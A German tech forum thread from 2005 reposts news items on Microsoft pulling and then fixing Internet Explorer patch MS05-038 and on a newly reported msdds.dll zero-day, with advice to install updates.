Microsoft zieht Update für Internet Explorer zurück
« Antwort #12 am: 10 August, 2005, 13:07 »
Microsoft hat den im Download Center angebotenen Patch MS05-038 zum Schließen mehrerer kritischen Lücken im Internet Explorer wieder zurückgezogen. Ein Klick auf den Download-Link produziert derzeit nur eine Fehlermeldung. Nach Angaben des Softwarekonzerns war die Datei fehlerhaft, sodass sich Windows aufgrund der ungültigen digitalen Signatur weigerte, den Patch zu installieren. Sobald die Entwickler das Update repariert haben, will man es im Download Center wieder zur Verfügung stellen.

Anwender, die zum Aktualisieren ihres Systems das automatische System-Update oder die Website Windows Update verwenden, hatten indes keine Probleme mit dem Patch. Deren Systeme sollten die gemeldeten Fehler bereits nicht mehr enthalten.

Zusätzlich zu den sechs angekündigten Patches können Anwender beim Update noch einen weiteren Softwareflicken angeboten bekommen. Der soll ein Problem nach der Installation des Sicherheitsupdate MS05-012 beheben. Unter Umständen erscheint in der Folge nämlich die Fehlermeldung "Generic Host Process".

Auf der französischen Sicherheitsseite FrSIRT sind derweil die ersten Exploits zum Ausnutzen von zwei der gemeldeten Lücken erschienen. Einer widmet sich der COM-Lücke im Internet Explorer und öffnet eine Hintertür auf Port 28876. Der andere bringt den Rechner über die RDP-Lücke zum Absturz oder Neustart.

Quelle und Links : http://www.heise.de/newsticker/meldung/62664

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline SiLæncer

  • Cheff-Cubie
  • *****
  • Beiträge: 189183
  • Ohne Input kein Output
    • DVB-Cube
Internet Explorer: Probleme mit Sicherheits-Patch behoben
« Antwort #13 am: 11 August, 2005, 19:56 »
Funktionierender Patch für Internet Explorer wieder per Download-Center zu haben

Am gestrigen 10. August 2005 hatte Microsoft anlässlich des monatlichen Patch-Days einen Sammel-Patch für den Internet Explorer veröffentlicht, um drei Sicherheitslücken in dem Browser zu schließen. Wurde der Patch über Microsofts Download-Center geladen, ließ er sich auf Grund eines Fehlers, der nun behoben ist, jedoch nicht installieren.

Bereits kurze Zeit nach der Veröffentlichung des Sammel-Patches für den Internet Explorer hatte Microsoft erfahren, dass sich der Patch nicht installieren ließ, wenn er via Download-Center geladen wurde. Dennoch hat es mehr als einen Tag gedauert, bis Microsoft das Problem abstellen konnte. Die ebenfalls am Patch-Day erschienenen Sicherheits-Patches für Windows waren von dem Problem nicht betroffen.

Da sich die Komplikationen nur auf Microsofts Download-Center beschränkten, konnte der Internet-Explorer-Patch auch gestern schon ohne Schwierigkeiten installiert werden, sofern man die Update-Funktion von Windows bemühte. Durch die Bereinigung des Fehlers kann der funktionierende Sammel-Patch für den Internet Explorer nun auch wieder über das betreffende Security Bulletin bezogen werden. Für alle Sicherheits-Patches gilt generell, dass Microsoft die kürzlich für Downloads gestartete Überprüfung einer Windows-Lizenz nicht vornimmt.

Zumindest für Windows XP mit Service Pack 2 bietet die Webseite Winhelpline.de bereits Setup-Routinen an, womit sich die einzeln geladenen Patches in einem Rutsch installieren lassen. In Kürze werden auch inoffizielle Patch-Pakete bzw. weitere Setup-Routinen erwartet, um die Sicherheitslücken von Windows und dem Internet Explorer mit einem Rutsch schließen zu können.

Quelle und Links : http://www.golem.de/0508/39797.html

Arbeits.- Testrechner :

Intel® Core™ i7-6700 (4 x 3.40 GHz / 4.00 GHz)
16 GB (2 x 8 GB) DDR4 SDRAM 2133 MHz
250 GB SSD Samsung 750 EVO / 1 TB HDD
ZOTAC Geforce GTX 1080TI AMPExtreme Core Edition 11GB GDDR5
MSI Z170A PC Mate Mainboard
DVD-Brenner Laufwerk
Microsoft Windows 10 Home 64Bit

TT S2 3200 ( BDA Treiber 5.0.1.8 ) + Terratec Cinergy 1200 C ( BDA Treiber 4.8.3.1.8 )

Offline Warpi

  • Master Of Disaster
  • User a.D.
  • ****
  • Beiträge: 1733
Kritische Lücke im Internet Explorer -- Tragweite unbekannt
« Antwort #14 am: 18 August, 2005, 15:28 »
Eine neue kritische Lücke in Microsofts Internet Explorer gefährdet die Systeme von Windows-Anwendern -- und keiner weiß genau, wer betroffen ist. Das französische Sicherheitsportal FrSIRT hat einen Zero-Day-Exploit veröffentlicht, bei dem bereits der Aufruf einer präparierten Webseite ein System mit Schadcode infizieren soll. Ursache der Lücke ist laut Microsoft und FrSIRT ein Fehler im COM-Objekt msdds.dll (Microsoft Design Tools Diagram Surface).

Auf Standardsystemen ist diese Datei aber normalerweise eigentlich nicht vorhanden: Laut Microsoft ist sie Bestandteil von Visual Studio. FrSIRT weist aber im Advisory darauf hin, dass auf dem Testsystem der Sicherheitsexperten kein Visual Studio installiert war.

Wie die verwundbare Datei auf den Rechner gelangt ist, bleibt vorerst offen. Eventuell ist msdds.dll auch Bestandteil bestimmter Installationen weiterer Software aus Redmond, etwa bei Designer und Office-Programmen. Microsoft untersucht das Problem zur Zeit genauer und will gegebenenfalls ein Security Update veröffentlichen.

Der Exploit soll auf einem infizierten PC eine Backdoor auf Port 28876 öffnen. Bei einem ersten Test der heise-Security-Redaktion auf einem Windows-XP-SP2 mit allen Patches und ohne Visual Studio funktionierte der Angriff jedoch nicht. Weitere Tests laufen noch -- sobald zusätzliche Ergebnisse und Informationen vorliegen, wird eine Meldung dazu erfolgen.

Bis dahin sollten Anwender vorsichtig sein, welche Seiten sie ansurfen. Zwar sollen noch keine Seiten Schadcode über die neue Lücke verbreiten, dies ändert sich in der Regel aber schnell. Auch für die vergangene Woche veröffentlichten COM-Lücken im Internet Explorer gibt es bereits Exploit und auch Server, die dem Anwender darüber Trojaner unterjubeln. Dagegen hilft allerdings das Einspielen der verfügbaren Patches.
(oder Linux als Os ;) )

Quelle : www.heise.de
« Letzte Änderung: 18 August, 2005, 15:28 von transwarp »
Mein Vdr / Audio/ Video / Homeserver

Intel Atom A330 Dualcore 2*1,6Ghz / 2 Gigabyte Ram
2 * 500 Gigabyte Samsung HDDS, Technisat Skystar2 DVBS
Ubuntu Jaunty Server, Vdr mit Webinterface, Openssh, Samba

2. Vdr
Pentium 3 / 1000 Mhz /  512 Mb Ram / Refurbished
1 * 200 Gigabyte Samsung HD, Technisat Skystar 2 DVBS
Ubuntu Karmic Server, Vdr mit Webinterface, Openssh, Samba

Asus Eee PC 1005P Netbook (Intel Atom N450 1.6GHz, 1GB RAM, 160GB HDD) Win 7 Starter, WarpIX Netbookremix + Ext. 500 GB 2.5 " HD

Videoschnitthardware
AMD Black Edition - AMD Phenom II X6, 6 x 3.2 GHz Prozessor, 8 GB DDR3 / 1600, 2 x Samsung 1TB, Nvidia Gt 240
Techno Trend S3200 , Windows 7 Homepremium / x64, Linux Mint Julia / x64

Die größte Fehlerquelle des PCS sitzt meist 30cm vor dem Bildschirm.